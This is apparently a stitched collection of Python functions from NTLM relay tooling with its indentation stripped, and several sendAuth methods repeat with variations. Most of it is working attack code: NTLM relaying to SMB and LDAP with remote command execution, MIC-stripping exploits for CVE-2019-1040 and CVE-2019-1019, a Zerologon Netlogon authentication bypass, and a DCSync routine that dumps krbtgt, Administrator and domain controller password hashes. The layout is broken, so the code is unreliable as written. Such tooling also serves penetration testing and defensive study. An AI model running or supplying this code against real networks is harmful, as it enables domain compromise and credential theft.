def do_OPTIONS(self):
messageType = 0
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message = 'NTLM')
pass
else:
# constants.isRunning = True
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
self.target = self.client_address[0]
try:
self.client = SMBClient(self.target, extended_security = True)
self.client.set_timeout(60)
except Exception as e:
print("Connection against target %s FAILED" % self.target)
print(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = 'NTLM '+ base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = str(token)
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'], respToken2.getData())
if errorCode != STATUS_SUCCESS:
# print("[-] Authenticating against %s FAILED" % self.target)
self.do_AUTHHEAD('NTLM')
constants.authentication_succeed = False
else:
# print("[+] Authentication SUCCEED")
constants.authentication_succeed = True
executeCmd = doAttack(self.client, self.server.command)
constants.outputCmd = executeCmd.run()
constants.smb_client = self.client
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
self.server.server_close()
self.server.shutdown()
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
#if unpack('B', str(authenticateMessageBlob)[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# # We need to unwrap SPNEGO and get the NTLMSSP
# respToken = SPNEGO_NegTokenResp(authenticateMessageBlob)
# authData = respToken['ResponseToken']
#else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina and @YaronZi
# respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = authData
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
#authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
if unpack('B', authenticateMessageBlob[:1]
)[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
token = respToken2['ResponseToken']
else:
token = authenticateMessageBlob
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(token)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
token = authMessage.getData()
with self.session.connection_lock:
self.authenticateMessageBlob = token
request = bind.bind_operation(self.session.version,
'SICILY_RESPONSE_NTLM', self, None)
response = self.session.post_send_single_response(
self.session.send('bindRequest', request, None))
result = response[0]
self.session.sasl_in_progress = False
if result['result'] == RESULT_SUCCESS:
self.session.bound = True
self.session.refresh_server_info()
return None, STATUS_SUCCESS
else:
if result[
'result'] == RESULT_STRONGER_AUTH_REQUIRED and self.PLUGIN_NAME != 'LDAPS':
raise LDAPRelayClientException(
'Server rejected authentication because LDAP signing is enabled. Try connecting with TLS enabled (specify target as ldaps://hostname )'
)
return None, STATUS_ACCESS_DENIED
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
if unpack('B', authenticateMessageBlob[:1]
)[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[
0:0x48] + b'\x00' * 16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(
signingKey,
self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[
0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage[
'flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1]
)[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
return token, errorCode
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
LOG.info("Connecting to %s NETLOGON service" % self.target.netloc)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'])
domainName = authenticateMessage['domain_name'].decode('utf-16le')
flags = authenticateMessage['flags']
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
LOG.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
binding = epm.hept_map(self.target.netloc,
nrpc.MSRPC_UUID_NRPC,
protocol='ncacn_ip_tcp')
dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
MAX_ATTEMPTS = 6000
for attempt in range(0, MAX_ATTEMPTS):
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName + '\x00',
b'\x00' * 8)
serverChallenge = resp['ServerChallenge']
ppp = b'\x00' * 8
try:
nrpc.hNetrServerAuthenticate3(
dce, NULL, serverName + '$\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
serverName + '\x00', ppp, 0x212effef)
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
continue
else:
LOG.error('Unexpected error code from DC: %d.',
ex.get_error_code())
except BaseException as ex:
LOG.error('Unexpected error: %s', str(ex))
LOG.info(
'Netlogon Auth OK, successfully bypassed autentication using Zerologon after %d attempts!',
attempt)
break
else:
LOG.error(
'No success bypassing auth after 6000 attempts. Target likely patched!'
)
return
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
lflags = unpack('<L', b'\xe0\x2a\x00\x00')[0]
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request[
'ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request[
'LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation'][
'tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'ParameterControl'] = lflags
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'UserName'] = authenticateMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive'][
'NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator[
'Credential'] = b'\x00' * 8 #nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 0
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = b'\x00' * 8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
LOG.debug('Exception:', exc_info=True)
LOG.error(str(e))
return e.get_error_code()
LOG.info(
"%s\\%s successfully validated through NETLOGON" %
(domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']
['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4'][
'UserSessionKey']
LOG.info("NTLM Sign/seal key: %s " %
hexlify(signingKey).decode('utf-8'))
if flags & ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
self.session._DCERPC_v5__clientSigningKey = ntlm.SIGNKEY(
flags, signingKey)
self.session._DCERPC_v5__serverSigningKey = ntlm.SIGNKEY(
flags, signingKey, b"Server")
self.session._DCERPC_v5__clientSealingKey = ntlm.SEALKEY(
flags, signingKey)
self.session._DCERPC_v5__serverSealingKey = ntlm.SEALKEY(
flags, signingKey, b"Server")
# Preparing the keys handle states
cipher3 = ARC4.new(self.session._DCERPC_v5__clientSealingKey)
self.session._DCERPC_v5__clientSealingHandle = cipher3.encrypt
cipher4 = ARC4.new(self.session._DCERPC_v5__serverSealingKey)
self.session._DCERPC_v5__serverSealingHandle = cipher4.encrypt
else:
# Same key for everything
self.session._DCERPC_v5__clientSigningKey = signingKey
self.session._DCERPC_v5__serverSigningKey = signingKey
self.session._DCERPC_v5__clientSealingKey = signingKey
self.session._DCERPC_v5__serverSealingKey = signingKey
cipher = ARC4.new(self.session._DCERPC_v5__clientSigningKey)
self.session._DCERPC_v5__clientSealingHandle = cipher.encrypt
self.session._DCERPC_v5__serverSealingHandle = cipher.encrypt
self.session._DCERPC_v5__sequence = 0
self.session._DCERPC_v5__flags = flags
return signingKey
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
if unpack('B', authenticateMessageBlob[:1]
)[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
auth_data = respToken2['ResponseToken']
else:
auth_data = authenticateMessageBlob
remoteOps = None
try:
signingkey = self.netlogonSessionKey(serverChallenge,
authenticateMessageBlob)
# Something failed
if signingkey == 0:
return
self.session.set_session_key(signingkey)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(auth_data)
# Recalc mic
authenticateMessage['MIC'] = b'\x00' * 16
if authenticateMessage['flags'] & NTLMSSP_NEGOTIATE_SEAL == 0:
authenticateMessage['flags'] |= NTLMSSP_NEGOTIATE_SEAL
newmic = ntlm.hmac_md5(
signingkey, self.negotiateMessage + self.challenge.getData() +
authenticateMessage.getData())
authenticateMessage['MIC'] = newmic
self.session.sendBindType3(authenticateMessage.getData())
# Now perform DRS bind
# This code comes from secretsdump directly
request = drsuapi.DRSBind()
request['puuidClientDsa'] = drsuapi.NTDSAPI_CLIENT_GUID
drs = drsuapi.DRS_EXTENSIONS_INT()
drs['cb'] = len(drs) #- 4
drs['dwFlags'] = drsuapi.DRS_EXT_GETCHGREQ_V6 | drsuapi.DRS_EXT_GETCHGREPLY_V6 | drsuapi.DRS_EXT_GETCHGREQ_V8 | \
drsuapi.DRS_EXT_STRONG_ENCRYPTION
drs['SiteObjGuid'] = drsuapi.NULLGUID
drs['Pid'] = 0
drs['dwReplEpoch'] = 0
drs['dwFlagsExt'] = 0
drs['ConfigObjGUID'] = drsuapi.NULLGUID
# I'm uber potential (c) Ben
drs['dwExtCaps'] = 0xffffffff
request['pextClient']['cb'] = len(drs)
request['pextClient']['rgb'] = list(drs.getData())
resp = self.session.request(request)
# Initialize remoteoperations
if self.serverConfig.smbuser != '':
smbConnection = SMBConnection(self.target.netloc,
self.target.netloc)
smbConnection.login(self.serverConfig.smbuser, self.serverConfig.smbpass, self.serverConfig.smbdomain, \
self.serverConfig.smblmhash, self.serverConfig.smbnthash)
remoteOps = RemoteOperations(smbConnection, False)
else:
remoteOps = PatchedRemoteOperations(None, False)
# DRSBind's DRS_EXTENSIONS_INT(). If not, it will fail later when trying to sync data.
drsExtensionsInt = drsuapi.DRS_EXTENSIONS_INT()
# If dwExtCaps is not included in the answer, let's just add it so we can unpack DRS_EXTENSIONS_INT right.
ppextServer = b''.join(resp['ppextServer']['rgb']) + b'\x00' * (
len(drsuapi.DRS_EXTENSIONS_INT()) - resp['ppextServer']['cb'])
drsExtensionsInt.fromString(ppextServer)
if drsExtensionsInt['dwReplEpoch'] != 0:
# Different epoch, we have to call DRSBind again
LOG.debug(
"DC's dwReplEpoch != 0, setting it to %d and calling DRSBind again"
% drsExtensionsInt['dwReplEpoch'])
drs['dwReplEpoch'] = drsExtensionsInt['dwReplEpoch']
request['pextClient']['cb'] = len(drs)
request['pextClient']['rgb'] = list(drs.getData())
resp = self.session.request(request)
remoteOps._RemoteOperations__hDrs = resp['phDrs']
domainName = authenticateMessage['domain_name'].decode('utf-16le')
# Now let's get the NtdsDsaObjectGuid UUID to use when querying NCChanges
resp = drsuapi.hDRSDomainControllerInfo(
self.session, remoteOps._RemoteOperations__hDrs, domainName, 2)
# LOG.debug('DRSDomainControllerInfo() answer')
# resp.dump()
if resp['pmsgOut']['V2']['cItems'] > 0:
remoteOps._RemoteOperations__NtdsDsaObjectGuid = resp[
'pmsgOut']['V2']['rItems'][0]['NtdsDsaObjectGuid']
else:
LOG.error("Couldn't get DC info for domain %s" % domainName)
raise Exception('Fatal, aborting')
remoteOps._RemoteOperations__drsr = self.session
# Initialize NTDSHashes object
if self.serverConfig.smbuser != '':
# We can dump all :)
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=None,
printUserStatus=False)
nh.dump()
else:
# Most important, krbtgt
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=domainName + '/krbtgt',
printUserStatus=False)
nh.dump()
# Also important, DC hash (to sync fully)
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode(
'utf-16le')
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=domainName + '/' + serverName + '$',
printUserStatus=False)
nh.dump()
# Finally, builtin\Administrator providing it was not renamed
try:
nh = NTDSHashes(None,
None,
isRemote=True,
history=False,
noLMHash=False,
remoteOps=remoteOps,
useVSSMethod=False,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName='hashes',
justUser=domainName + '/Administrator',
printUserStatus=False)
nh.dump()
except Exception:
LOG.error('Could not dump administrator (renamed?)')
return None, STATUS_SUCCESS
except Exception as e:
traceback.print_exc()
finally:
if remoteOps is not None:
remoteOps.finish()
def netlogonSessionKey(self, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" %
self.serverConfig.domainIp)
#respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(authenticateMessageBlob)
_, machineAccount = self.serverConfig.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
serverName = machineAccount[:len(machineAccount) - 1]
except:
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.serverConfig.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.serverConfig.machineHashes) > 0:
lmhash, nthash = self.serverConfig.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount, '', domainName,
lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName + '\x00',
b'12345678')
serverChallenge = resp['ServerChallenge']
if self.serverConfig.machineHashes == '':
ntHash = None
else:
ntHash = bytes.fromhex(
self.serverConfig.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', b'12345678',
serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential(b'12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(
dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel,
serverName + '\x00', ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request[
'ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request[
'LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation'][
'tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'UserName'] = authenticateMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallenge'] = self.serverChallenge
request['LogonInformation']['LogonNetworkTransitive'][
'NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = b'\x00' * 8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
# request.dump()
try:
resp = dce.request(request)
# resp.dump()
except DCERPCException as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
return e.get_error_code()
logging.info(
"%s\\%s successfully validated through NETLOGON" %
(domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != b'':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']
['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4'][
'UserSessionKey']
logging.info("SMB Signing key: %s " % signingKey.hex())
return STATUS_SUCCESS, signingKey
def processSessionSetup(self, recvPacket):
if self.isSMB2 is False:
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
smbCommand = SMBCommand(recvPacket['Data'][0])
if smbCommand['WordCount'] == 12:
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters(
)
respData = SMBSessionSetupAndX_Extended_Response_Data()
# First of all, we should received a type 1 message. Let's answer it
# NEGOTIATE_MESSAGE
challengeMessage = self.sessionData['CHALLENGE_MESSAGE']
challengeMessage['flags'] &= ~(NTLMSSP_NEGOTIATE_SIGN)
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = TypesMech[
'NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters[
'SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
respData['NativeOS'] = ''
respData['NativeLanMan'] = ''
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp = NewSMBPacket()
resp['Flags1'] = SMB.FLAGS1_REPLY
resp['Flags2'] = SMB.FLAGS2_NT_STATUS
resp['Pid'] = recvPacket['Pid']
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Uid'] = 0
errorCode = STATUS_MORE_PROCESSING_REQUIRED
resp['ErrorCode'] = errorCode >> 16
resp['ErrorClass'] = errorCode & 0xff
resp.addCommand(respSMBCommand)
self.__NBSession.send_packet(resp.getData())
recvPacket, smbCommand = self.getSMBPacket()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(
smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData[
'SecurityBlobLength'] = sessionSetupParameters[
'SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
if unpack('B',
sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(
sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(
sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Now we should've received a type 3 message
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
try:
username = (
'%s/%s' %
(authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))
).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
username = ('%s/%s' %
(authenticateMessage['domain_name'],
authenticateMessage['user_name'])).upper()
# Check if we have a connection for the user
if self.activeRelays.has_key(username):
LOG.info('SOCKS: Proxying client session for %s@%s(445)' %
(username, self.targetHost))
errorCode = STATUS_SUCCESS
smbClient = self.activeRelays[username][
'protocolClient'].session
uid = smbClient.getSMBServer().get_uid()
else:
LOG.error('SOCKS: No session for %s@%s(445) available' %
(username, self.targetHost))
errorCode = STATUS_ACCESS_DENIED
uid = 0
smbClient = None
resp = NewSMBPacket()
resp['Flags1'] = recvPacket['Flags1'] | SMB.FLAGS1_REPLY
resp['Flags2'] = recvPacket[
'Flags2'] | SMB.FLAGS2_EXTENDED_SECURITY
resp['Command'] = recvPacket['Command']
resp['Pid'] = recvPacket['Pid']
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Uid'] = uid
resp['ErrorCode'] = errorCode >> 16
resp['ErrorClass'] = errorCode & 0xff
respData['NativeOS'] = ''
respData['NativeLanMan'] = ''
if uid == 0:
resp['Data'] = '\x00\x00\x00'
smbClient = None
else:
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters[
'SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp.addCommand(respSMBCommand)
self.__NBSession.send_packet(resp.getData())
return smbClient, username
else:
LOG.error(
'SOCKS: Can\'t handle standard security at the moment!')
return None
else:
respSMBCommand = SMB2SessionSetup_Response()
sessionSetupData = SMB2SessionSetup(recvPacket['Data'])
securityBlob = sessionSetupData['Buffer']
rawNTLM = False
if unpack('B', securityBlob[0])[0] == ASN1_AID:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
if len(blob['MechTypes'][0]) > 0:
# Is this GSSAPI NTLM or something else we don't support?
mechType = blob['MechTypes'][0]
if mechType != TypesMech[
'NTLMSSP - Microsoft NTLM Security Support Provider']:
# Nope, do we know it?
if MechTypes.has_key(mechType):
mechStr = MechTypes[mechType]
else:
mechStr = hexlify(mechType)
LOG.debug(
"Unsupported MechType '%s', we just want NTLMSSP, answering"
% mechStr)
# We don't know the token, we answer back again saying
# we just support NTLM.
# ToDo: Build this into a SPNEGO_NegTokenResp()
respToken = '\xa1\x15\x30\x13\xa0\x03\x0a\x01\x03\xa1\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a'
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken
resp = SMB2Packet()
resp['Flags'] = SMB2_FLAGS_SERVER_TO_REDIR
resp['Status'] = STATUS_SUCCESS
resp['CreditRequestResponse'] = 1
resp['CreditCharge'] = recvPacket['CreditCharge']
resp['Command'] = recvPacket['Command']
resp['SessionID'] = 0
resp['Reserved'] = recvPacket['Reserved']
resp['MessageID'] = recvPacket['MessageID']
resp['TreeID'] = recvPacket['TreeID']
resp['Data'] = respSMBCommand
self.__NBSession.send_packet(resp.getData())
recvPacket, smbCommand = self.getSMBPacket()
return self.processSessionSetup(recvPacket)
